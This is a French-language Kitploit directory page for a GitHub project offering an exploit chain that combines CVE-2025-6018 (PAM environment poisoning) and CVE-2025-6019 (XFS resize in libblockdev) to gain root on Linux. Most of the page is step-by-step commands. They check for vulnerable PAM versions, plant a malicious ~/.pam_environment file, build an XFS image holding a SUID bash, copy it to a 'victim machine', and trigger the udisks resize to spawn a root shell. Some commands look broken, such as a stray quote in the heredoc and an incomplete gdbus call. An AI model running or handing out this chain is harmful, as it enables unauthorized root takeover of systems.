Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-6018-and-CVE-2025-6019 — Chaîne d'exploitation pour l'élévation de privilèges via l'empoisonnement de l'environnement PAM (CVE-2025-6018) et le redimensionnement du système de fichiers XFS (CVE-2025-6019) pour obtenir un shell root sur les systèmes Linux. | Kitploit
Outils/GitHubGitHub/localh0ste/cve-2025-6018-and-cve-2025-6019
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionRed TeamingExploitation de Binaires
GitHublocalh0ste/cve-2025-6018-and-cve-2025-6019

CVE-2025-6018-and-CVE-2025-6019

Chaîne d'exploitation pour l'élévation de privilèges via l'empoisonnement de l'environnement PAM (CVE-2025-6018) et le redimensionnement du système de fichiers XFS (CVE-2025-6019) pour obtenir un shell root sur les systèmes Linux.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
11il y a 6 moisPas encore vérifié

Vérifiez s'il est vulnérable ou non

root@kitploit:~
rpm -q pam || dpkg -l | grep libpam

or

find /etc/pam.d/ -name '*' -exec grep -l 'pam_env' {} \; 2>/dev/null

or
find /etc/pam.d/ -name '*' -exec grep -l 'pam_systemd' {} \; 2>/dev/null

or

systemctl --version | head -1

Si la version est incluse :(Version PAM vulnérable détectée ) ~Référence cve_2025_6018

"pam-1.3.0", "pam-1.3.1", "pam-1.4.0", "pam-1.5.0", "pam-1.5.1", "pam-1.5.2", "pam-1.5.3", "pam-1.6.0"

Étapes d'exploitation

Création d'un fichier d'environnement malveillant (CVE-2025-6018 Empoisonnement de l'environnement)

root@kitploit:~
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
XDG_SESSION_TYPE OVERRIDE=x11
XDG_SESSION_CLASS OVERRIDE=user
XDG_RUNTIME_DIR OVERRIDE=/tmp/runtime
SYSTEMD_LOG_LEVEL OVERRIDE=debug'''
EOF

Créer l'image XFS (sur votre propre PC) et l'envoyer à la machine distante

( CVE-2025-6019 -- Accès root via le redimensionnement XFS dans libblockdev)

root@kitploit:~
dd if=/dev/zero of=./xfs.image bs=1M count=300
mkfs.xfs ./xfs.image
mkdir ./xfs.mount
mount -t xfs ./xfs.image ./xfs.mount
cp /bin/bash ./xfs.mount

#Create SUID bit as /bash shell

chmod 04555 ./xfs.mount/bash
umount ./xfs.mount
gzip xfs.image
scp ./xfs.image.gz hostname@<ip>:/home/<username>

Sur la machine victime

root@kitploit:~
gzip -d xfs.image.gz
gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method
gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanReboot

Reconnectez-vous au système ( reconnexion ssh pour activer la session active )

root@kitploit:~
udisksctl loop-setup --file ./xfs.image --no-user-interaction
while true; do /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break; done 2>/dev/null &
gdbus call --system --dest org.freedesktop.UDisks2 --object-path /org/freedesktop/UDisks2/block_devices/loop0 --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
 /tmp/blockdev*/bash -p

Obtenez un shell root

Référence : https://www.exploit-db.com/exploits/52386

Télécharger l’outil